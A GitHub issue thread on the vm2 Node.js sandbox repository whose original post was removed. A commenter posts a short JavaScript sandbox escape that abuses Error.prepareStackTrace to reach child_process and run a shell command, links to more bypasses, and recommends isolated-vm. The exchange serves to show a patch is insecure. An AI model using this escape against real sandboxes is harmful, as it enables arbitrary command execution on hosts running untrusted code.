[content removed for the very unfriendly management]

patriksimek / vm2

Advanced vm/sandbox for Node.js

MIT License

3.86k stars 293 forks source link

[content removed for the very unfriendly management] #535

Closed mgttt closed 5 months ago

mgttt commented 5 months ago

[content removed for the very unfriendly management]

j4k0xb commented 5 months ago

That's just the stock node vm 🤔 vm2 did a lot more to prevent escapes but it still wasn't enough

bypass:

Error.prepareStackTrace = (e, frames) => {
  frames.constructor
    .constructor("return process")()
    .mainModule.require("child_process")
    .execSync("touch flag");
};
throw new Error();

j4k0xb commented 5 months ago

Please don't rely on a few patches or node's vm in general for dealing with untrusted code, it gives a false sense of security and there are countless other ways to bypass (e.g. https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd)

That's why the readme says

Consider migrating your code to isolated-vm.

XmiliaH commented 5 months ago

Your soulution does not help as @j4k0xb showed again and again. Stop asking here what problems your solution sill has. It has nothing to do with vm2. Move this discussion over to your own repo.